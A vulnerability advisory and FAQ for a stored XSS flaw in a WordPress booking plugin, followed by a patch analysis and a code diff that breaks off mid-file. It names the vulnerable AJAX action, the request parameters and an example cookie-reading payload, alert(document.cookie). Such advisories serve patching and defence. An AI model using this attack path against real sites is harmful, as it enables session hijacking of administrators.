What is CVE-2026-0742?

CVE-2026-0742 is a stored cross-site scripting (XSS) vulnerability in the Smart Appointment & Booking plugin for WordPress, affecting versions 1.0.7 and earlier. It allows authenticated attackers with Subscriber-level access or higher to inject arbitrary JavaScript into pages that execute when viewed by other users.

How does the vulnerability work?

The vulnerability exists in the `saab_save_form_data` AJAX action, where user-supplied data is not properly sanitized or escaped. An attacker can send a POST request with malicious JavaScript payloads, which are stored and later executed when an administrator or user views the affected page.

Who is affected by this vulnerability?

Any WordPress site using the Smart Appointment & Booking plugin version 1.0.7 or earlier is vulnerable. Specifically, authenticated users with Subscriber access or higher can exploit this vulnerability to inject scripts.

How can I check if my site is affected?

To check if your site is affected, verify the version of the Smart Appointment & Booking plugin installed. If it is version 1.0.7 or earlier, your site is vulnerable. Additionally, review your site’s logs for any unauthorized script injections.

How can I fix the vulnerability?

The vulnerability is patched in version 1.0.8 of the Smart Appointment & Booking plugin. To mitigate the issue, update the plugin to the latest version immediately. Ensure that you backup your site before performing updates.

What does the CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability is not the most critical, it poses a significant risk and should be addressed promptly to prevent potential exploitation.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to session hijacking, unauthorized actions within a user’s session, or defacement of the site. Attackers can inject scripts that steal cookies or redirect users to malicious sites.

What security measures were implemented in the patch?

The patch for CVE-2026-0742 includes input validation improvements, such as nonce checks and sanitization of user input using `sanitize_text_field`. It also ensures proper output escaping in the admin interface to prevent script execution.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an authenticated attacker can exploit the vulnerability by logging into a WordPress site and sending a crafted request to the vulnerable AJAX endpoint. It shows the steps to inject malicious JavaScript into form data.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling it until a patch can be applied. Additionally, review user roles and limit access to the plugin for lower-privileged users to reduce the risk of exploitation.

Are there any additional resources for understanding XSS vulnerabilities?

For more information on XSS vulnerabilities, refer to the OWASP XSS Prevention Cheat Sheet and the CWE-79 documentation. These resources provide guidelines on preventing and mitigating XSS attacks.

What is the difference between stored and reflected XSS?

Stored XSS occurs when malicious scripts are stored on the server and executed when users access the affected content, while reflected XSS occurs when scripts are executed immediately from user input without being stored. CVE-2026-0742 is a stored XSS vulnerability.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0742: Smart Appointment & Booking <= 1.0.7 – Authenticated (Subscriber+) Stored Cross-Site Scripting via saab_save_form_data AJAX Action (smart-appointment-booking)

CVE ID CVE-2026-0742

Plugin smart-appointment-booking

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.0.7

Patched Version 1.0.8

Disclosed February 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0742:
The Smart Appointment & Booking WordPress plugin version 1.0.7 and earlier contains an authenticated stored cross-site scripting (XSS) vulnerability. The flaw exists in the plugin’s AJAX handler for saving form data, allowing attackers with Subscriber-level access or higher to inject arbitrary JavaScript. This script executes in the context of any user viewing the compromised page, leading to a CVSS score of 6.4 (Medium severity).

The root cause is insufficient input sanitization and output escaping for user-supplied data processed by the `saab_save_form_data` AJAX action. In the vulnerable code within `/smart-appointment-booking/inc/admin/class.saab.admin.action.php`, the `update_form_entry_data()` function (lines 527-545) directly uses unsanitized `$_POST[‘updated_data’]` values. The function stores this data via `update_post_meta()` without proper validation. Later, when the stored data is rendered in the WordPress admin interface, the plugin fails to escape the output, allowing script execution.

Exploitation requires an authenticated attacker with at least Subscriber privileges. The attacker sends a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `saab_save_form_data`. The request includes `entry_id` (the target form entry) and `updated_data[]` parameters containing malicious JavaScript payloads. For example, an attacker could inject `alert(document.cookie)` into a form field value. When an administrator or other user views the affected booking entry in the plugin’s admin panel, the malicious script executes in their browser session.

The patch addresses the vulnerability by implementing multiple security improvements. In the `update_form_entry_data()` function, the developer added a nonce check using `wp_verify_nonce()` (line 530). The `$updated_data` variable is now processed through `map_deep( wp_unslash( $_POST[‘updated_data’] ), ‘sanitize_text_field’ )` (line 538), ensuring all array values are sanitized. The patch also adds proper output escaping in multiple template rendering functions, such as using `esc_attr()` and `esc_html()` for dynamic values in HTML attributes and content (e.g., lines 630, 1128, 1203).

Successful exploitation allows attackers to perform actions within the victim’s WordPress session. This includes stealing session cookies, performing administrative actions, defacing websites, or redirecting users to malicious sites. Since the vulnerability is stored, a single injection affects all users who view the compromised page. Attackers with Subscriber access can target administrators, potentially leading to full site compromise through session hijacking or privilege escalation.

Differential between vulnerable and patched code

Code Diff

--- a/smart-appointment-booking/inc/admin/class.saab.admin.action.php
+++ b/smart-appointment-booking/inc/admin/class.saab.admin.action.php
@@ -199,9 +199,8 @@
 				'message' => 'Invalid request.',
 			);
 			$get_notification_array = array();
-			if (isset($_POST['notification_data'])) {
-
-				parse_str($_POST['notification_data'], $form_data);
+			if ( isset( $_POST['notification_data'] ) ) {
+				parse_str( sanitize_text_field( wp_unslash( $_POST['notification_data'] ) ), $form_data );
 				$post_id = $form_data['form_id'];
                	$index = $form_data['editnotify'];
 				$mail_body='mail_body' . $index;
@@ -393,10 +392,10 @@
 		 * Update booking form entries in backend
 		 */
 		function view_booking_entry( $post ){
-			if( ! isset( $_REQUEST['_wpnonce'] ) || ! wp_verify_nonce( $_REQUEST['_wpnonce'], '_wpnonce' ) ){
+			if ( ! isset( $_REQUEST['_wpnonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['_wpnonce'] ) ), '_wpnonce' ) ) {
 				//wp_die( 'Security check failed. Refresh the page and retry again!' );
 			}
-            $post_id = ( isset( $_GET['post_id'] ) ) ? $_GET['post_id'] : '';
+            $post_id = isset( $_GET['post_id'] ) ? absint( wp_unslash( $_GET['post_id'] ) ) : 0;
             $form_data = get_post_meta( $post_id, 'saab_submission_data', true );
             $form_id = get_post_meta( $post_id, 'saab_form_id', true );
             $timeslot = get_post_meta( $post_id, 'saab_timeslot', true );
@@ -528,13 +527,14 @@
             <?php
         }
 		function update_form_entry_data(){
-			// if( ! isset( $_POST['zwt_saab_common_nonce'] ) || ! wp_verify_nonce( $_POST['zwt_saab_common_nonce'], 'zwt_saab_common_nonce' ) ){
-			// 	wp_die( 'Security check failed. Refresh the page and retry again!' );
-			// }
-			if (isset($_POST['entry_id']) && isset($_POST['updated_data']) ) {
-				$entry_id = ( isset( $_POST['entry_id'] ) ) ? $_POST['entry_id'] : '';
-				$get_submitted_data = get_post_meta($entry_id, 'saab_submission_data', true);
-				$updated_data = ( isset( $_POST['updated_data'] ) ) ? $_POST['updated_data'] : '';
+			if ( ! isset( $_POST['security'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['security'] ) ), 'saab_ajax_nonce' ) ) {
+				wp_send_json_error( array( 'message' => __( 'Security check failed.', 'smart-appointment-booking' ) ) );
+				wp_die();
+			}
+			if ( isset( $_POST['entry_id'] ) && isset( $_POST['updated_data'] ) ) {
+				$entry_id = isset( $_POST['entry_id'] ) ? absint( wp_unslash( $_POST['entry_id'] ) ) : 0;
+				$get_submitted_data = get_post_meta( $entry_id, 'saab_submission_data', true );
+				$updated_data = isset( $_POST['updated_data'] ) && is_array( $_POST['updated_data'] ) ? map_deep( wp_unslash( $_POST['updated_data'] ), 'sanitize_text_field' ) : array();
 				foreach ($updated_data as $key => $value) {
 					if (isset($get_submitted_data['data'][$key])) {
 						$get_submitted_data['data'][$key] = $value;
@@ -574,11 +574,9 @@
 			// Add your page content here
 			echo "<div class='notification-page-main m-4 p-1 ' >";

-			if (isset($_GET['post_type']) && isset($_GET['post_id']) && isset( $_GET['nonce'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash ($_POST['nonce'] ) ) , 'other_setting' )) {
-
-				$post_type = sanitize_text_field($_GET['post_type']);
-
-				$post_id = absint( $_GET['post_id']);
+			if ( isset( $_GET['post_type'] ) && isset( $_GET['post_id'] ) && isset( $_GET['nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_GET['nonce'] ) ), 'other_setting' ) ) {
+				$post_type = sanitize_text_field( wp_unslash( $_GET['post_type'] ) );
+				$post_id = absint( wp_unslash( $_GET['post_id'] ) );

 				?>
 				<ul class="nav nav-tabs" id="myTabs" role="tablist">
@@ -632,7 +630,7 @@
 														$fieldKey = $option['fieldkey'];
 														$fieldLabel = $option['fieldlabel'];
 														$selected = ($fieldKey == $first_name) ? 'selected' : '';
-														echo '<option value="' . $fieldKey . '" ' . $selected . '>' . $fieldLabel . '</option>';
+														echo '<option value="' . esc_attr( $fieldKey ) . '" ' . esc_attr( $selected ) . '>' . esc_html( $fieldLabel ) . '</option>';
 													}
 												?>
 											</select>
@@ -994,12 +992,12 @@
 				$response['message'] = esc_html__('Something went wrong', 'smart-appointment-booking');
 				wp_send_json($response);
 			}else{
-				if (null !== ($_POST['post_id'] ?? null) && null !== absint($_POST['notification_id'] ?? null) && null !== sanitize_text_field($_POST['new_state'] ?? null)) {
-					$post_id = isset($_POST['post_id']) ? absint($_POST['post_id']) : 0;
-					$notification_id = isset($_POST['notification_id']) ? absint($_POST['notification_id']) : 0;
+				if ( isset( $_POST['post_id'] ) && isset( $_POST['notification_id'] ) && isset( $_POST['new_state'] ) ) {
+					$post_id = absint( wp_unslash( $_POST['post_id'] ) );
+					$notification_id = absint( wp_unslash( $_POST['notification_id'] ) );

-					$index = ltrim($notification_id, "notify_");
-					$new_state = isset($_POST['new_state']) ? sanitize_text_field($_POST['new_state']) : '';
+					$index = ltrim( (string) $notification_id, 'notify_' );
+					$new_state = sanitize_text_field( wp_unslash( $_POST['new_state'] ) );

 					// Get the existing notification metadata
 					$notification_data = get_post_meta($post_id, 'saab_notification_data', true);
@@ -1033,9 +1031,10 @@
 				wp_send_json_error('Invalid request.');
 				wp_die();
 			}
-			if (isset($_POST['indexes'])) {
-				$post_id = isset($_POST['post_id']) ? absint($_POST['post_id']) : 0;
-				$indexesToDelete = isset($_POST['indexes']) ? $_POST['indexes'] : '';
+			if ( isset( $_POST['indexes'] ) && is_array( $_POST['indexes'] ) ) {
+				$post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : 0;
+				$indexes_raw = wp_unslash( $_POST['indexes'] ); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized -- sanitized via map_deep below
+				$indexesToDelete = map_deep( $indexes_raw, 'sanitize_text_field' );
 				$notification_metadata = get_post_meta($post_id, 'saab_notification_data', true);
 				foreach ($indexesToDelete as $index) {
 					if (isset($notification_metadata[$index])) {
@@ -1129,7 +1128,7 @@
 											$available_types = array('any', 'booked', 'pending', 'cancelled', 'approved','waiting','submitted');
 											foreach ($available_types as $avail_type) {
 												$selected = ($avail_type === $type) ? 'selected' : '';
-												echo '<option value="' . esc_html($avail_type) . '" ' . esc_attr($selected) . '>' . ucfirst(esc_html($avail_type)) . '</option>';
+												echo '<option value="' . esc_html($avail_type) . '" ' . esc_attr($selected) . '>' . esc_html( ucfirst( $avail_type ) ) . '</option>';

 											}
 											?>
@@ -1204,7 +1203,7 @@

 				$post_id = isset( $_POST['post_id'] ) ? intval( $_POST['post_id'] ) : 0;

-				$form_data = isset( $_POST['form_data'] ) ? sanitize_text_field($_POST['form_data']) : array();
+				$form_data = isset( $_POST['form_data'] ) ? sanitize_text_field( wp_unslash( $_POST['form_data'] ) ) : '';

 				update_post_meta($post_id, 'saab_formschema', $form_data );

@@ -1228,10 +1227,7 @@
 				$form_title = get_the_title($form_id);

 				if (isset($form_title)) {
-					echo sprintf(
-						esc_html__('%s', 'smart-appointment-booking'),
-						esc_html($form_title)
-					);
+					echo esc_html( $form_title );

 				}else{
 					echo '-';
@@ -1241,10 +1237,7 @@
 				$booking_status = get_post_meta($post_id,'saab_entry_status',true);

 				if (isset($booking_status) && !empty($booking_status)) {
-					echo sprintf(
-						esc_html__('%s', 'smart-appointment-booking'),
-						esc_html(ucfirst($booking_status))
-					);
+					echo esc_html( ucfirst( $booking_status ) );
 				}else{
 					echo '-';
 				}
@@ -1262,11 +1255,7 @@
 				$booked_date = $bookedday."-".$bookedmonth."-".$bookedyear;
 				$booked_date = gmdate('d F, Y', strtotime($booked_date));
 					if (isset($booking_date) && !empty($booking_date)) {
-						echo sprintf(
-							esc_html__('%s', 'smart-appointment-booking'),
-							esc_html($booked_date)
-						);
-
+						echo esc_html( $booked_date );
 					}
 				}else{
 					echo '-';
@@ -1276,10 +1265,7 @@
 				$timeslot = get_post_meta($post_id, 'saab_timeslot', true );

 				if (isset($timeslot) && !empty($timeslot)) {
-					echo sprintf(
-						esc_html__('%s', 'smart-appointment-booking'),
-						esc_html($timeslot)
-					);
+					echo esc_html( $timeslot );
 				}else{
 					echo '-';
 				}
@@ -1341,7 +1327,7 @@
 			} else {
 				$error = 1;
 				$error_mess = "Something went wrong";
-				error_log("post_id not found while preview");
+				error_log( "post_id not found while preview" ); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
 			}

 			if ($error == 1) {
@@ -1450,7 +1436,7 @@
 				wp_send_json_error(array('message' => 'Nonce verification failed'));
 				wp_die();
 			}
-			$user_mapping = isset($_POST['saabuser_mapping']) ? sanitize_text_field($_POST['saabuser_mapping']) : '';
+			$user_mapping = isset( $_POST['saabuser_mapping'] ) ? sanitize_text_field( wp_unslash( $_POST['saabuser_mapping'] ) ) : '';

 			parse_str($user_mapping, $user_mapping_array);

@@ -1482,7 +1468,7 @@
 			}
 			if (isset($_POST['confirmation_data'])) {

-				parse_str(wp_unslash(sanitize_text_field($_POST['confirmation_data'])), $formdata);
+				parse_str( sanitize_text_field( wp_unslash( $_POST['confirmation_data'] ) ), $formdata );

 				$post_id = $formdata['post_id'];
 				if (isset($formdata['confirmation'])) {
@@ -1582,11 +1568,11 @@

 				foreach ($options as $value => $label) {
 					$selected = selected($status, $value, false);
-					echo '<option value="' . esc_attr($value) . '" ' . $selected . '>' . esc_html($label) . '</option>';
+					echo '<option value="' . esc_attr($value) . '" ' . esc_attr( $selected ) . '>' . esc_html($label) . '</option>';
 				}
 				echo '</select>';

-				$selected_form_id = isset($_GET['form_filter']) ? sanitize_text_field($_GET['form_filter']) : '';
+				$selected_form_id = isset( $_GET['form_filter'] ) ? sanitize_text_field( wp_unslash( $_GET['form_filter'] ) ) : '';

 				$forms_query = new WP_Query($args);

@@ -1621,30 +1607,31 @@
 				return;
 			}

-			if ('edit.php' === $pagenow && 'manage_entries' === $typenow) {
-				$booking_status = isset($_GET['booking_status']) ? sanitize_text_field($_GET['booking_status']) : '';
-				$form_filter = isset($_GET['form_filter']) ? intval($_GET['form_filter']) : 0;
+			if ( 'edit.php' === $pagenow && 'manage_entries' === $typenow ) {
+				$booking_status = isset( $_GET['booking_status'] ) ? sanitize_text_field( wp_unslash( $_GET['booking_status'] ) ) : '';
+				$form_filter = isset( $_GET['form_filter'] ) ? absint( wp_unslash( $_GET['form_filter'] ) ) : 0;
+
+				if ( ! empty( $booking_status ) || ! empty( $form_filter ) ) {
+					// phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_query -- Filtering entries by status/form requires meta_query.
+					$meta_query = array( 'relation' => 'and' );

-				if (!empty($booking_status) || !empty($form_filter)) {
-					$meta_query = array('relation' => 'and');
-
-					if (!empty($booking_status) && in_array($booking_status, array('booked', 'approved', 'cancelled', 'pending', 'waiting', 'submitted'))) {
+					if ( ! empty( $booking_status ) && in_array( $booking_status, array( 'booked', 'approved', 'cancelled', 'pending', 'waiting', 'submitted' ), true ) ) {
 						$meta_query[] = array(
-							'key' => 'entry_status',
-							'value' => $booking_status,
-							'compare' => '='
+							'key'     => 'entry_status',
+							'value'   => $booking_status,
+							'compare' => '=',
 						);
 					}

-					if (!empty($form_filter)) {
+					if ( ! empty( $form_filter ) ) {
 						$meta_query[] = array(
-							'key' => 'saab_form_id',
-							'value' => $form_filter,
-							'compare' => '='
+							'key'     => 'saab_form_id',
+							'value'   => $form_filter,
+							'compare' => '=',
 						);
 					}

-					$query->set('meta_query', $meta_query);
+					$query->set( 'meta_query', $meta_query );
 				}
 			}
 		}
@@ -1699,30 +1686,31 @@
 			}
 			// Define the current page number

-			$current_page = isset($_POST['page']) ? absint($_POST['page']) : 1;
-			$timeslot = isset($_POST['timeslot']) ? sanitize_text_field($_POST['timeslot']) : '';
-			$booking_date = isset($_POST['booking_date']) ? sanitize_text_field($_POST['booking_date']) : '';
+			$current_page = isset( $_POST['page'] ) ? absint( wp_unslash( $_POST['page'] ) ) : 1;
+			$timeslot = isset( $_POST['timeslot'] ) ? sanitize_text_field( wp_unslash( $_POST['timeslot'] ) ) : '';
+			$booking_date = isset( $_POST['booking_date'] ) ? sanitize_text_field( wp_unslash( $_POST['booking_date'] ) ) : '';

+			// phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_query -- Waiting list filtered by timeslot/booking_date.
 			$args = array(
-				'post_type' => 'manage_entries',
-				'posts_per_page' => 5, // Show 5 entries per page
-				'paged' => $current_page, // Use the current page number for pagination
-				'meta_query' => array(
+				'post_type'      => 'manage_entries',
+				'posts_per_page' => 5,
+				'paged'          => $current_page,
+				'meta_query'     => array(
 					'relation' => 'AND',
 					array(
-						'key' => 'timeslot',
-						'value' => $timeslot,
-						'compare' => '='
+						'key'     => 'timeslot',
+						'value'   => $timeslot,
+						'compare' => '=',
 					),
 					array(
-						'key' => 'booking_date',
-						'value' => $booking_date,
-						'compare' => '='
-					)
-				)
-			);
+						'key'     => 'booking_date',
+						'value'   => $booking_date,
+						'compare' => '=',
+					),
+				),
+			);

-			$query = new WP_Query($args);
+			$query = new WP_Query( $args );
 			ob_start();
 			if ($query->have_posts()) {
 				echo '<div class="border-top border-dark mb-2"></div>';
--- a/smart-appointment-booking/inc/admin/class.saab.admin.fieldmeta.php
+++ b/smart-appointment-booking/inc/admin/class.saab.admin.fieldmeta.php
@@ -25,11 +25,11 @@
         }

         function saab_get_available_seats_per_timeslot($checktimeslot,$date){
-
+            // phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_query -- Seats count filtered by timeslot/booking_date.
             $args = array(
-                'post_type' => 'manage_entries',
+                'post_type'      => 'manage_entries',
                 'posts_per_page' => -1,
-                'meta_query' => array(
+                'meta_query'     => array(
                     'relation' => 'AND',
                     array(
                         'key' => 'timeslot',
@@ -233,15 +233,17 @@
                     </div>
                     <div id="waitinglist_main">
                     <?php
-
-                       $current_page = isset($_GET['page']) ? absint($_GET['page']) : 1;
+                       // Pagination; nonce not used for GET page parameter in admin list.
+                       // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+                       $current_page = isset( $_GET['page'] ) ? absint( wp_unslash( $_GET['page'] ) ) : 1;
+                       // phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_query -- Waiting list filtered by timeslot/status/booking_date.
                        $args = array(
-                        'post_type' => 'manage_entries',
-                        'posts_per_page' => 5,
-                        'paged' => $current_page,
-                        'orderby'   => 'date',
-                        'order'     => 'ASC',
-                        'meta_query' => array(
+                        'post_type'      => 'manage_entries',
+                        'posts_per_page' => 5,
+                        'paged'          => $current_page,
+                        'orderby'        => 'date',
+                        'order'          => 'ASC',
+                        'meta_query'     => array(
                             'relation' => 'AND',
                             array(
                                 'key' => 'timeslot',
@@ -310,7 +312,7 @@
                             echo '<span class="item-count" style="margin-right: 5px;">' . esc_html($query->found_posts) . ' Items</span>';
                             if ($total_pages > 1) {

-                                    echo '<select id="saabpage-number"  data-timeslot="' . esc_attr($timeslot) . '" data-booking_date="' . esc_attr($booking_date) . '" data-nonce="'.wp_create_nonce('get_paginated_items_nonce').'">';
+                                    echo '<select id="saabpage-number"  data-timeslot="' . esc_attr($timeslot) . '" data-booking_date="' . esc_attr($booking_date) . '" data-nonce="' . esc_attr( wp_create_nonce( 'get_paginated_items_nonce' ) ) . '">';
                                         for ($page = 1; $page <= $total_pages; $page++) {
                                             echo '<option value="' . esc_attr($page) . '"';
                                             if ($page == $current_page) {
@@ -351,7 +353,7 @@
                 ?>
                 <script type='text/javascript'>

-                    var myScriptData = <?php echo $myScriptData; ?>;
+                    var myScriptData = <?php echo $myScriptData; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- JSON schema from post meta, validated on save. ?>;
                     window.onload = function() {

                         var formioBuilder = Formio.builder(document.getElementById('builder'), {
@@ -586,7 +588,7 @@
                                         );
                                         //echo wp_kses( $this->timezone_dropdown($post->ID), $allow_time_dropdown );
                                     ?>
-                                    <?php echo $this->timezone_dropdown($post->ID); ?>
+                                    <?php echo wp_kses_post( $this->timezone_dropdown( $post->ID ) ); ?>

                                 </div>
                                 <div class="form-group form-general-group">
@@ -862,14 +864,14 @@
             {
               return $post_id;
             }
-            if (isset($_POST['cal_title'])) {
-                $cal_title = sanitize_text_field($_POST['cal_title']);
-                update_post_meta($post_id, 'saab_cal_title', $cal_title);
-            }
-
-            if (isset($_POST['cal_description'])) {
-                $cal_description = sanitize_text_field($_POST['cal_description']);
-                update_post_meta($post_id, 'saab_cal_description', $cal_description);
+            if ( isset( $_POST['cal_title'] ) ) {
+                $cal_title = sanitize_text_field( wp_unslash( $_POST['cal_title'] ) );
+                update_post_meta( $post_id, 'saab_cal_title', $cal_title );
+            }
+
+            if ( isset( $_POST['cal_description'] ) ) {
+                $cal_description = sanitize_text_field( wp_unslash( $_POST['cal_description'] ) );
+                update_post_meta( $post_id, 'saab_cal_description', $cal_description );
             }
             // Section Tab 1
             // Check if the enable_booking field is set and save the value
@@ -880,68 +882,68 @@
                 delete_post_meta($post_id, 'saab_enable_booking');
             }
             //Weekdays
-            if (isset($_POST['weekdays'])) {
-                $selected_weekdays = array_map('sanitize_text_field', $_POST['weekdays']);
-                update_post_meta($post_id, 'saab_weekdays', $selected_weekdays);
+            if ( isset( $_POST['weekdays'] ) ) {
+                $selected_weekdays = array_map( 'sanitize_text_field', (array) wp_unslash( $_POST['weekdays'] ) );
+                update_post_meta( $post_id, 'saab_weekdays', $selected_weekdays );
             } else {
                 update_post_meta($post_id, 'saab_weekdays', array());
             }

             // Save the radio button value for appointment Type
-            if (isset($_POST['appointment_type'])) {
-                $selected_option = sanitize_text_field($_POST['appointment_type']);
+            if ( isset( $_POST['appointment_type'] ) ) {
+                $selected_option = sanitize_text_field( wp_unslash( $_POST['appointment_type'] ) );
                 update_post_meta($post_id, 'saab_appointment_type', $selected_option);
             }

             // Save the  link value if Appointment Type "Virtual" is selected
-            if (isset($_POST['virtual_link'])) {
-                $link_value = sanitize_text_field($_POST['virtual_link']);
+            if ( isset( $_POST['virtual_link'] ) ) {
+                $link_value = sanitize_text_field( wp_unslash( $_POST['virtual_link'] ) );
                 update_post_meta($post_id, 'saab_virtual_link', $link_value);
             }

             //Symbol
             if ( isset( $_POST['label_symbol'] ) ) {
-                $label_symbol = sanitize_text_field( $_POST['label_symbol'] );
+                $label_symbol = sanitize_text_field( wp_unslash( $_POST['label_symbol'] ) );
                 update_post_meta( $post_id, 'saab_label_symbol', $label_symbol );
             }

              //Symbol
              if ( isset( $_POST['cost'] ) ) {
-                $cost = sanitize_text_field( $_POST['cost'] );
+                $cost = sanitize_text_field( wp_unslash( $_POST['cost'] ) );
                 update_post_meta( $post_id, 'saab_cost', $cost );
             }

             if ( isset( $_POST['timezone'] ) ) {
-                $timezone = sanitize_text_field( $_POST['timezone'] );
+                $timezone = sanitize_text_field( wp_unslash( $_POST['timezone'] ) );
                 update_post_meta( $post_id, 'saab_timezone', $timezone );
             }

             if ( isset( $_POST['bookmap_email'] ) ) {
-                $map_email = sanitize_text_field( $_POST['bookmap_email'] );
+                $map_email = sanitize_text_field( wp_unslash( $_POST['bookmap_email'] ) );
                 update_post_meta( $post_id, 'saab_map_email', $map_email );
             }

             if ( isset( $_POST['cost'] ) ) {
-                $cost = sanitize_text_field( $_POST['cost'] );
+                $cost = sanitize_text_field( wp_unslash( $_POST['cost'] ) );
                 update_post_meta( $post_id, 'saab_saab_cost', $cost );
             }
-
+
             //selected_date
-            if (isset($_POST['selected_date'])) {
-                update_post_meta($post_id, 'saab_selected_date', sanitize_text_field($_POST['selected_date']));
+            if ( isset( $_POST['selected_date'] ) ) {
+                update_post_meta( $post_id, 'saab_selected_date', sanitize_text_field( wp_unslash( $_POST['selected_date'] ) ) );
             }
-
-            if (isset($_POST['start_time'])) {
-                update_post_meta($post_id, 'saab_start_time', sanitize_text_field($_POST['start_time']));
+
+            if ( isset( $_POST['start_time'] ) ) {
+                update_post_meta( $post_id, 'saab_start_time', sanitize_text_field( wp_unslash( $_POST['start_time'] ) ) );
             }
-
-            if (isset($_POST['end_time'])) {
-                update_post_meta($post_id, 'saab_end_time', sanitize_text_field($_POST['end_time']));
+
+            if ( isset( $_POST['end_time'] ) ) {
+                update_post_meta( $post_id, 'saab_end_time', sanitize_text_field( wp_unslash( $_POST['end_time'] ) ) );
             }
-
+
              //Steps Duration
             if ( isset( $_POST['steps_duration'] ) ) {
-                $steps_duration = sanitize_text_field($_POST['steps_duration']);
+                $steps_duration = map_deep( wp_unslash( $_POST['steps_duration'] ), 'sanitize_text_field' );
                 $sanitized_steps_duration = array(
                     'hours' => sanitize_text_field( $steps_duration['hours'] ),
                     'minutes' => sanitize_text_field( $steps_duration['minutes'] )
@@ -951,22 +953,24 @@
                 update_post_meta( $post_id, 'saab_steps_duration', $sanitized_steps_duration );
             }
             //timeslot_duration
-            if ( isset( $_POST['booking_stops_after'] ) ) {
-                $booking_stops_after_duration = $_POST['booking_stops_after'];
+            $booking_stops_after_duration = ( isset( $_POST['booking_stops_after'] ) && is_array( $_POST['booking_stops_after'] ) )
+                ? map_deep( wp_unslash( $_POST['booking_stops_after'] ), 'sanitize_text_field' )
+                : array();
+            if ( ! empty( $booking_stops_after_duration ) ) {
                 $sanitized_booking_stops_after_duration = array(
-                    'hours' => sanitize_text_field( $booking_stops_after_duration['hours'] ),
-                    'minutes' => sanitize_text_field( $booking_stops_after_duration['minutes'] )
+                    'hours' => isset( $booking_stops_after_duration['hours'] ) ? $booking_stops_after_duration['hours'] : '',
+                    'minutes' => isset( $booking_stops_after_duration['minutes'] ) ? $booking_stops_after_duration['minutes'] : '',
                 );

                 // Update the post meta data with the field value
                 update_post_meta( $post_id, 'saab_booking_stops_after', $sanitized_booking_stops_after_duration );
             }
             //timeslot_duration
-            if ( isset( $_POST['timeslot_duration'] ) ) {
-                $timeslot_duration = sanitize_text_field($_POST['timeslot_duration']);
+            if ( isset( $_POST['timeslot_duration'] ) && is_array( $_POST['timeslot_duration'] ) ) {
+                $timeslot_duration = map_deep( wp_unslash( $_POST['timeslot_duration'] ), 'sanitize_text_field' );
                 $sanitized_timeslot_duration = array(
-                    'hours' => sanitize_text_field( $timeslot_duration['hours'] ),
-                    'minutes' => sanitize_text_field( $timeslot_duration['minutes'] )
+                    'hours' => isset( $timeslot_duration['hours'] ) ? $timeslot_duration['hours'] : '',
+                    'minutes' => isset( $timeslot_duration['minutes'] ) ? $timeslot_duration['minutes'] : '',
                 );

                 update_post_meta( $post_id, 'saab_timeslot_duration', $sanitized_timeslot_duration );
@@ -974,36 +978,35 @@

             //no_of_booking
             if ( isset( $_POST['no_of_booking'] ) ) {
-                $selected_date = absint($_POST['no_of_booking']);
+                $selected_date = absint( wp_unslash( $_POST['no_of_booking'] ) );
                 update_post_meta( $post_id, 'saab_no_of_booking', $selected_date );
             }
             //waiting List
-            if (isset($_POST['waiting_list']) && filter_var($_POST['waiting_list'], FILTER_VALIDATE_BOOLEAN)) {
-                update_post_meta($post_id, 'saab_waiting_list', 1);
+            if ( isset( $_POST['waiting_list'] ) && filter_var( wp_unslash( $_POST['waiting_list'] ), FILTER_VALIDATE_BOOLEAN ) ) {
+                update_post_meta( $post_id, 'saab_waiting_list', 1 );
             } else {
                 delete_post_meta($post_id, 'saab_waiting_list');
             }
             //timeslotBookingAllowed
-            if (isset($_POST['timeslot_BookAllow']) && filter_var($_POST['timeslot_BookAllow'], FILTER_VALIDATE_BOOLEAN)) {
+            if ( isset( $_POST['timeslot_BookAllow'] ) && filter_var( wp_unslash( $_POST['timeslot_BookAllow'] ), FILTER_VALIDATE_BOOLEAN ) ) {
                 update_post_meta($post_id, 'saab_timeslot_BookAllow', 1);
             } else {
                 delete_post_meta($post_id, 'saab_timeslot_BookAllow');
             }
             //enable_auto_approve
-            if (isset($_POST['enable_auto_approve']) && filter_var($_POST['enable_auto_approve'], FILTER_VALIDATE_BOOLEAN)) {
+            if ( isset( $_POST['enable_auto_approve'] ) && filter_var( wp_unslash( $_POST['enable_auto_approve'] ), FILTER_VALIDATE_BOOLEAN ) ) {
                 update_post_meta($post_id, 'saab_enable_auto_approve', 1);
             } else {
                 delete_post_meta($post_id, 'saab_enable_auto_approve');
             }
             //multiple breaks
-            if (isset($_POST['breaktimeslots'])) {
-                $breaktimeslots = sanitize_text_field($_POST['breaktimeslots']);
-
-                // Sanitize and save the values
+            if ( isset( $_POST['breaktimeslots'] ) && is_array( $_POST['breaktimeslots'] ) ) {
+                $breaktimeslots = map_deep( wp_unslash( $_POST['breaktimeslots'] ), 'sanitize_text_field' );
+
                 $sanitized_breaktimeslots = array();
-                foreach ($breaktimeslots as $breaktimeslot) {
-                    $breakstart_time = sanitize_text_field($breaktimeslot['start_time']);
-                    $breakend_time = sanitize_text_field($breaktimeslot['end_time']);
+                foreach ( $breaktimeslots as $breaktimeslot ) {
+                    $breakstart_time = isset( $breaktimeslot['start_time'] ) ? $breaktimeslot['start_time'] : '';
+                    $breakend_time = isset( $breaktimeslot['end_time'] ) ? $breaktimeslot['end_time'] : '';
                     $sanitized_breaktimeslots[] = array(
